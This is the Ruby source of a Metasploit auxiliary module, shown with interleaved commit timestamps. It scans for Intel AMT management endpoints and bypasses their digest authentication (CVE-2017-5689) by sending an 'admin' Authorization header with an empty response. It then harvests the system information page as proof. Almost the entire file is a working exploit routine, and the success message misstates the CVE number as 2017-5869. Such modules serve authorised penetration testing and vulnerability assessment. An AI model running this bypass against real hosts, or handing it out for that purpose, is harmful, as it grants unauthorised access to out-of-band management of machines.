2017-05-08 18:24:00 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2017-05-08 18:24:00 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'rex/proto/http'
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Intel AMT Digest Authentication Bypass Scanner',
|
|
|
|
'Description' => %q{
|
|
|
|
This module scans for Intel Active Management Technology endpoints and attempts
|
|
|
|
to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service
|
2017-08-27 01:01:10 +00:00
|
|
|
can be found on ports 16992, 16993 (tls), 623, and 624 (tls).
|
2017-05-08 18:24:00 +00:00
|
|
|
},
|
|
|
|
'Author' => 'hdm',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2017-5689' ],
|
|
|
|
[ 'URL', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ],
|
|
|
|
[ 'URL', 'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr' ],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'May 05 2017'
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(16992),
|
|
|
|
])
|
|
|
|
end
|
|
|
|
|
|
|
|
# Fingerprint a single host
|
|
|
|
def run_host(ip)
|
|
|
|
begin
|
|
|
|
connect
|
|
|
|
res = send_request_raw({ 'uri' => '/hw-sys.htm', 'method' => 'GET' })
|
|
|
|
unless res && res.headers['Server'].to_s.index('Intel(R) Active Management Technology')
|
|
|
|
disconnect
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
vprint_status("#{ip}:#{rport} - Found an Intel AMT endpoint: #{res.headers['Server']}")
|
|
|
|
|
|
|
|
unless res.headers['WWW-Authenticate'] =~ /realm="([^"]+)".*nonce="([^"]+)"/
|
|
|
|
vprint_status("#{ip}:#{rport} - AMT service did not send a valid digest response")
|
|
|
|
disconnect
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
realm = $1
|
|
|
|
nonce = $2
|
|
|
|
cnonce = Rex::Text.rand_text(10)
|
|
|
|
|
|
|
|
res = send_request_raw(
|
|
|
|
{
|
|
|
|
'uri' => '/hw-sys.htm',
|
|
|
|
'method' => 'GET',
|
|
|
|
'headers' => {
|
|
|
|
'Authorization' =>
|
|
|
|
"Digest username=\"admin\", realm=\"#{realm}\", nonce=\"#{nonce}\", uri=\"/hw-sys.htm\", " +
|
|
|
|
"cnonce=\"#{cnonce}\", nc=1, qop=\"auth\", response=\"\""
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
unless res && res.body.to_s.index("Computer model")
|
|
|
|
vprint_error("#{ip}:#{rport} - AMT service does not appear to be vulnerable")
|
2017-05-08 19:08:59 +00:00
|
|
|
return
|
2017-05-08 18:24:00 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
proof = res.body.to_s
|
|
|
|
proof_hash = nil
|
|
|
|
|
2017-06-14 21:53:01 +00:00
|
|
|
info_keys = res.body.scan(/<td class=r1><p>([^\<]+)(?:<\/p>)?/).map{|x| x.first.to_s.gsub("/", "/") }
|
2017-05-08 18:24:00 +00:00
|
|
|
if info_keys.length > 0
|
|
|
|
proof_hash = {}
|
|
|
|
proof = ""
|
|
|
|
|
|
|
|
info_vals = res.body.scan(/<td class=r1>([^\<]+)</).map{|x| x.first.to_s.gsub("/", "/") }
|
|
|
|
info_keys.each do |ik|
|
|
|
|
iv = info_vals.shift
|
|
|
|
break unless iv
|
|
|
|
proof_hash[ik] = iv
|
|
|
|
proof << "#{iv}: #{ik}\n"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
print_good("#{ip}:#{rport} - Vulnerable to CVE-2017-5869 #{proof_hash.inspect}")
|
|
|
|
|
|
|
|
report_note(
|
|
|
|
:host => ip,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:port => rport,
|
|
|
|
:type => 'intel.amt.system_information',
|
|
|
|
:data => proof_hash
|
|
|
|
)
|
|
|
|
|
|
|
|
report_vuln({
|
|
|
|
:host => rhost,
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:name => "Intel AMT Digest Authentication Bypass",
|
|
|
|
:refs => self.references,
|
2017-06-14 21:53:01 +00:00
|
|
|
:info => proof
|
2017-05-08 18:24:00 +00:00
|
|
|
})
|
|
|
|
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
ensure
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|